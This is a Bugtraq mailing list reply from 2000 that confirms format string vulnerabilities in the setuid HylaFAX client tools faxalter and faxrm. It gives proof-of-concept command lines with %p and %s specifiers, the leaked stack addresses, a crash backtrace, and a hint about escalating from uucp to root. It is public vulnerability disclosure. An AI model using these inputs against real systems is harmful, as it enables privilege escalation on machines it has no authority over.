Bugtraq mailing list archives

Re: hylafax

From: KF <dotslash () snosoft com>
Date: Mon, 04 Sep 2000 04:54:19 -0400

Same deal on Mandrake 8.0...

hylafax-client-4.1-5mdk.i586.rpm 

[root@linux /root]# cat /etc/redhat-release
Linux Mandrake release 8.0 (Traktopel) for i586

[root@linux /root]# ls -al /usr/bin/faxalter
-rwxr-xr-x    1 root     root        13380 Aug  6  2001
/usr/bin/faxalter*

[root@linux /root]# /usr/bin/faxalter -h %p,%p,%p,%p,%p,%p,%p -D 1
0x804a153,0x401b3290,0x1,0x8048364,0xbffff25c,(nil),0x40015b94: Unknown
host

[root@linux elguapo]# /usr/bin/faxalter -h %s,%s,%s -D 1
Segmentation fault (core dumped)
[root@linux elguapo]# gdb  /usr/bin/faxalter core

(gdb) bt
#0  0x40209ab7 in vfprintf () from /lib/libc.so.6
#1  0x4020d0f0 in vfprintf () from /lib/libc.so.6
#2  0x40207d7b in vfprintf () from /lib/libc.so.6
#3  0x40066509 in FaxClient::vprintError () from
/usr/lib/libfaxutil.so.4.0.1

-KF


There are some format strings vulnerbilities in the lastest hylafax package
try faxrm -h %x 1 or faxalter -h %x -D 1 for "proof of concept".
Both faxrm and faxalter are installed setuid uucp on FreeBSD (installed from
port collection). uid uucp is not that exciting but with some luck you'll
find uucp owned binaries running from cron with uid 0.

--
Sent through GMX FreeMail - http://www.gmx.net

Current thread:

hylafax christer . oberg (Sep 24)
- Re: hylafax Robert van der Meulen (Sep 24)
- Re: hylafax KF (Sep 24)